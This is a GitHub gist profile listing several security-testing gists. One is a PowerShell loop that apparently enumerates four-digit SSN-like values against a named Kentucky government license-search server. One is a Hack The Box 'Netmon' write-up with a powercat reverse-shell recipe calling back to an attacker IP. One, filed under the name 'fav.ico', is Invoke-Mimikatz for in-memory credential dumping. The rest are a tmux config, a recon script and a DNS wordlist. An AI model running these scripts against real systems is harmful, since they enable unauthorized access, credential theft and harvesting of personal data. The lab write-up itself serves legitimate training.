Skip to content

Instantly share code, notes, and snippets.

View zer0trip's full-sized avatar

Sean Adams zer0trip

  • Kentucky, USA
  • 15:08 (UTC -04:00)
View GitHub Profile
@zer0trip
zer0trip / testing.md
Last active March 8, 2019 20:28
testing

for($4ssn=1111;$4ssn -lt 9999;$4ssn++)

{ $response = Invoke-WebRequest -Uri "http://kydevxggovweb1.wadapps1.gotdev.ky.gov/kbnnew/SearchLicense.aspx?TYP=ARNP" -Method "POST" -Headers @{"Cache-Control"="max-age=0"; "Origin"="http://kydevxggovweb1.wadapps1.gotdev.ky.gov"; "Upgrade-Insecure-Requests"="1"; "DNT"="1"; "User-Agent"="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"; "Accept"="text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8"; "Referer"="http://kydevxggovweb1.wadapps1.gotdev.ky.gov/kbnnew/SearchLicense.aspx?TYP=ARNP"; "Accept-Encoding"="gzip, deflate"; "Accept-Language"="en-US,en;q=0.9"} -ContentType "application/x-www-form-urlencoded" -Body "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE3MjQ4NTUzNzAPZBYCZg9kFgICAw9kFgICBQ9kFhICCQ9kFgICAQ8PFgIeBFRleHQFFFJOIG9yIEFQUk4gTGljZW5zZSAjZGQCCw9kFgICBQ8PFgIeBE1vZGULKiVTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlRleHRCb3hNb2RlAmRkAg0PFgIeB1Zpc2libGVoZAIPD

@zer0trip
zer0trip / netmon.md
Last active March 6, 2019 16:35
HTB - Netmon

Nmap 7.70 scan initiated Sun Mar 3 20:14:40 2019 as: nmap -Pn -sC -sV -oA netmon 10.10.10.152

Nmap scan report for 10.10.10.152 Host is up (0.051s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-02-19 11:18PM 1024 .rnd | 02-25-19 09:15PM

inetpub | 07-16-16 08:18AM PerfLogs

method 1 (preferred)

wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

printf "powercat -c <KALI IP> -p 443 -ep\n" >> powercat.ps1

nohup python -m SimpleHTTPServer 80 &

nc -lvp 443 # from another tmux pane, not sure if it mattered...
@zer0trip
zer0trip / .tmux.conf
Created March 1, 2019 14:55 — forked from snuggs/.tmux.conf
TMUX configuration file
##############################
# _
# | |_ _ __ ___ _ ___ __
# | __| '_ ` _ \| | | \ \/ /
# | |_| | | | | | |_| |> <
# \__|_| |_| |_|\__,_/_/\_\
#
#############################
#
# COPY AND PASTE
@zer0trip
zer0trip / fav.ico
Last active February 22, 2019 18:03
MimikatzFix
This file has been truncated, but you can view the full file.
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
@zer0trip
zer0trip / converter.sh
Created May 27, 2018 21:50 — forked from xdavidhu/converter.sh
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
# Converter.sh by @xdavidhu
# This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix
# With this script, you can convert domain lists to resolved IP lists without duplicates.
# Usage: ./converter.sh [domain-list-file] [output-file]
echo -e "[+] Converter.sh by @xdavidhu\n"
if [ -z "$1" ] || [ -z "$2" ]; then
echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]"
exit 1
fi
@zer0trip
zer0trip / all.txt
Created March 16, 2018 17:20 — forked from jhaddix/all.txt
dnsall
This file has been truncated, but you can view the full file.
@
*
0
00
0-0
000
0000
00000